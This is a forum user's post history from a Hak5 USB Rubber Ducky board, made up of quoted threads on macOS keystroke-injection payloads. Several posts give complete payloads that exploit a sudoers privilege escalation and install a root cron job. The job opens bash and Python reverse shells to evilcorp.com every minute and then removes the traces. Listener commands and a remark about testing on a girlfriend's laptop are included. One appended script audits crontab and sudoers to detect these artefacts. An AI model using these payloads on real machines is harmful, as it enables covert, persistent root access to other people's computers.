Posts posted by V3sth4cks153
-
Hi.
I think that's what you're looking for: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/
This payload uses crontab, but it works just as well !
The only problem is that it relies on a privilege escalation vulnerability in OSX Yosemite, which has been patched in OS X 10.10.5, and as far as I'm aware, it's only been tested on Yosemite.
I hope this solves your issue !
V3sth4cks153
-
Sad news :'-(
Yeah ! But there still are people who won't update before a long time ! So it's still relevant...
-
I've managed to solve this by adding a few delays, but the main fix was adding a space after setting the volume since in some languages or settings, the apostrophe isn't automatically set, only when a character or space is followed by it.
So here is my adaptation, probably smaller delays would still work:
DELAY 1000
GUI SPACE
DELAY 2000
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING osascript -e 'set volume 7'
DELAY 500
SPACE
DELAY 500
ENTER
DELAY 500
STRING open
DELAY 500
ENTER
Great ! I'm glad you found a solution to your problem !
-
The vulnerability has been patched in 10.10.5 !
-
The vulnerability has been patched in 10.10.5 !
-
My problem is solved, thanks.
You're welcome !
-
Any idea???
If I'm not mistaken, this means the Ducky is unable to read the SD card... Do you have another one to try and see if it works ?
I hope this helps you,
V3sth4cks153
-
I really need help on this one... Anyone ?
-
Nice! Let me know how it went :)
I tried the first payload, which uses the bash reverse shell, and it worked without any problem on my mac ! I'll try it on other macs tomorrow, and let you know how this goes...
However, when trying to use the second one, which uses python, I was blocked because it uses some backslashes... I tried modifying the keyboard properties, but as I just posted here: https://forums.hak5.org/index.php?/topic/36433-multiple-modifier-keys-in-keyboard-layout/, I can't get it to work... Do you know how to use more than one modifier key in the properties file ?
-
Hi.
I've been trying to modify the Swiss German keyboard properties file for use with my Swiss French MacBook Pro, and so far I've managed to make everything work, besides the backslash ( "\" ) key, because it requires both the ALT and SHIFT modifier keys, and it looks like the encoder doesn't support multiple modifier keys in keyboard properties.
I came across this thread which talked about recompiling the encoder, which I don't have a clue how to do...
Does anyone have an idea how to solve this problem ?
Thanks,
V3sth4cks153
-
Good news!!
I've been searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected.
Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection.
This is the Ducky payload:
DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 200
STRING Terminal
DELAY 200
ENTER
DELAY 500
COMMAND n
DELAY 300
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 100
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab -
ENTER
DELAY 100
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 100
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
DELAY 100
COMMAND w
DELAY 100
COMMAND q
And on your server, to listen for the connection you have to run:
sudo socat `tty`,raw,echo=0 tcp-listen:443
NOTE: Most likely you don't have socat installed, but you can do it very easily via apt-get (if your server is Debian based Linux. I'm not sure if it's available in OS X via homebrew).
This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour as an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :)
To exit, just press «Ctrl + D».
Same as before, it will try to reconnect every 60 seconds.
I hope this helps. I've tested it and it works like a charm.
That's so cool ! Really well done ! I'll test it first thing tomorrow !
-
I think this might be a delay issue... Try adding more delay at the beginning of the script (something like "DELAY 5000" should be fine), and also increasing the delays between each command.
So I have tried the following:
- online encoder
- default duckyencode
- duckyencoder from midnitesnake
All with this payload to begin with: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---osx-youtube-blaster
Sometimes the spotlight is not opened correctly, but the ENTER presses are never set right. If it opens terminal, the string for volume is put in, but no enter is pressed. Then the string open youtube is put in, and then ENTER is pressed but of course it can't open it since the command is wrong (two commands in one line).
Who can help me get over this noobishness?
I hope this helps you !
V3sth4cks153.
-
To disable it you just should run:
sudo crontab -e
In the victim's computer. This will open a text editor and you just have to remove only the last line which is the one that the script created. Then save and you're done.
Ok great ! Thanks ! I'll give you feedback as soon as I get a chance to test it.
-
Oh ! I understand ! So it's not a question of being more discreet then... Thanks!
The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab.
Yes, this makes it difficult to find, especially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :)
Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky).
When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead).
Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write:
ftp myserver.com
And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.
Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection?
Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address...
I'm not sure if I'm making myself clear. I'm sorry, English is not my native language :)
Thanks!
For your problem with the arrow keys, I think it might be a NetCat issue, but I really don't know how to get around it...
Don't worry, you're making yourself perfectly clear. At least for me even if English is not my native language as well ! :)
-
Hope it works for you :)
I've tested in a couple of Macs by now, and everything works as expected.
I hope so ! It would be so cool ! But is there a way to disable it though ? If so, could you give me the command please ? Thanks
-
Hi! I'm new to the Rubber Ducky and to this community.
I've made a simple payload to create a reverse bash in an OS X target by using crontab.
I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session.
Anyway, this is my payload:
DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 300
STRING Terminal
DELAY 300
ENTER
DELAY 700
COMMAND n
DELAY 500
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 200
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab -
ENTER
DELAY 200
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 200
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
COMMAND Q
What this does is:
- Open the terminal
- Magically grant sudo privileges (many thanks to V3sth4cks153 for this)
- Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP)
- Remove the newly added privileges to the current user in /etc/sudoers
- Close the terminal app
So now, all we have to do in our attacking machine is:
sudo nc -l -p 443
We wait one minute (max) and we're in with root privileges.
Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it.
Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want.
I just tested it on my girlfriend's Macbook Air and it works flawlessly.
One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this?
Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect.
Hope you like it!
Hi ! That looks really good ! I think that maybe the scripts you saw use plists for hiding purposes ? But even using crontab I think is covert enough for the average Mac user not to notice it.
The problem you have may be caused by the encoding of your payload... I had some problems with language properties... For example, encoding a payload with the Swiss layout sometimes caused some special characters (<, >, and some other ones) to be swapped, but it never happened with the arrow keys. What keyboard layout are you using ?
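A defender's check for the two artefacts the payloads in this thread leave behind (the every-minute root cron job carrying a bash /dev/tcp or Python pty reverse shell, and the temporary NOPASSWD:ALL line in /etc/sudoers), written as an added example that is not from the thread or its authors. The crontab and sudoers samples, the host name and the user name are constructed, and the indicator regexes are an assumption about what such lines look like, not an exhaustive signature.

```shell
#!/bin/sh
# Added example: audit a root crontab and /etc/sudoers for the persistence and
# privilege artefacts discussed in the thread. All sample data below is constructed.

# Constructed root crontab shaped like the thread's bash /dev/tcp and python pty lines.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1
* * * * * python -c "import socket,os,pty; s=socket.socket(); pty.spawn(\"/bin/bash\")" evilcorp.com 443'

# Constructed /etc/sudoers: stock rules plus a NOPASSWD:ALL grant for a normal user.
SAMPLE_SUDOERS='root ALL=(ALL) ALL
%admin ALL=(ALL) ALL
alice ALL=(ALL) NOPASSWD:ALL'

# Print non-comment crontab lines carrying reverse-shell indicators:
# bash /dev/tcp redirections, Python socket/pty spawns, or nc/ncat/socat invocations.
reverse_shell_cron_lines() {
  printf '%s\n' "$1" | grep -Ev '^[[:space:]]*#' \
    | grep -E '/dev/tcp/|socket\.socket\(|pty\.spawn\(|(^|[[:space:]])(nc|ncat|socat)[[:space:]]'
}

# Number of such lines; grep -c '' prints 0 on empty input instead of nothing.
count_reverse_shell_cron() {
  reverse_shell_cron_lines "$1" | grep -c ''
}

# Number of jobs scheduled every minute, the reconnect cadence both payloads rely on.
count_every_minute_jobs() {
  printf '%s\n' "$1" | grep -Ec '^\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]'
}

# Print sudoers lines granting NOPASSWD:ALL to an account that is neither root nor a group.
nopasswd_all_users() {
  printf '%s\n' "$1" | grep -E 'NOPASSWD:[[:space:]]*ALL' | grep -Ev '^(root|%)'
}

count_nopasswd_all_users() {
  nopasswd_all_users "$1" | grep -c ''
}

# Live use on a Mac (root is needed to read root's crontab and /etc/sudoers):
#   count_reverse_shell_cron "$(sudo crontab -l 2>/dev/null)"
#   nopasswd_all_users "$(sudo cat /etc/sudoers)"
echo "reverse-shell cron lines: $(count_reverse_shell_cron "$SAMPLE_CRONTAB")"  # 2
echo "every-minute jobs:        $(count_every_minute_jobs "$SAMPLE_CRONTAB")"   # 2
echo "NOPASSWD:ALL users:       $(count_nopasswd_all_users "$SAMPLE_SUDOERS")"  # 1
```

The `ed` step in the payloads removes the sudoers line again within a second or so, so the crontab check is the durable one; the sudoers check catches a run that was interrupted before cleanup.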
-
This vulnerability is great!
I've just created a payload for a persistent reverse bash in OS X using it:
https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/
About visudo:
I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload has been executed, just delete the last line of the file like this:
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 200
I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.
Hope it helps!
Hi. That's really cool !
It's even better than the ":$d" command in visudo ! Being a bit of a bash beginner, I didn't even think about not opening the file in the first place... I'll test it on my computer when I'm back home from holidays.
-
You're welcome !
thanks.
-
This looks fun. I have a few questions though, so say I want to execute this on my own machine.... Do I just plug in the Duck and it starts Quacking away? Also, do you have a repo of all of these ducky scripts available? If so do you mind if I make a few? You have some pretty bad ass work on this forum. :)
Thanks ! I'm glad you like it ! To answer your first question, it should work right away. Since the script makes the computer download an image from the Internet, all you need is an Internet connection, without any prework. I have a GitHub Repo of all the Rubber Ducky scripts I've made. You can find it right here: https://github.com/V3sth4cks153/USB-Rubber-Ducky-Scripts
Of course if you want to contribute to it, feel free to do so !
-
Thanks! I tried last night to make my own but with no success. I will give this a run!
You're welcome ! Tell us if it works ! I didn't test it on my side...
-
This just made me want to make a DuckSlurp script for Mac OS X ! Here it is : https://forums.hak5.org/index.php?/topic/36324-payload-os-x-duckslurp/
EDIT:
In the works
I found that it's already been done ! Here: https://forums.hak5....ackground-asap/
I may try to improve it a bit but only if I get the time.
-
I just stumbled upon this topic, which made me want to make a similar script, but for Mac OS X, since I couldn't find any.
EDIT:
In the works
I found that it's already been done ! Here: https://forums.hak5.org/index.php?/topic/34697-payload-osx-run-duckslurp-shell-in-the-background-asap/
I may try to improve it a bit but only if I get the time.
-
thanks, now how do I use it?
like how do I put that into the duck?
also, do I need to edit the VIDPID.txt? if so then what do I type in VIDPID.txt?
If I'm not mistaken, you have to take the microSD card out of the Ducky, and read it with an adapter on your computer. Then, put both the VID_PID_SWAPPER.exe and VIDPID.txt on the microSD card, and run the VID_PID_SWAPPER.exe. Basically what happens is the VID_PID_SWAPPER.exe picks a random VID/PID combination from the VIDPID.txt file, which is loaded with about 350 different combinations (so, no, you don't have to edit it). Once you run the exe, a VIDPID.bin file should be created on the microSD card, and that's what tells the Ducky what VID and PID to use.
Remember to run the EXE ON the microSD card, or else it won't do anything !
V3sth4cks153
-
how do I use the VID_PID_SWAPPER in windows
and does anyone have a link to the compiled exe file?
I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Utils/VID_PID_SWAPPER_1.1
I hope this helps you !
V3sth4cks153
Config Rubber Ducky on MAC OS (in Classic USB Rubber Ducky)
Hi,
No, you don't need to: the script will work on the stock firmware, as it is fully self contained.
Regards,
V3sth4cks153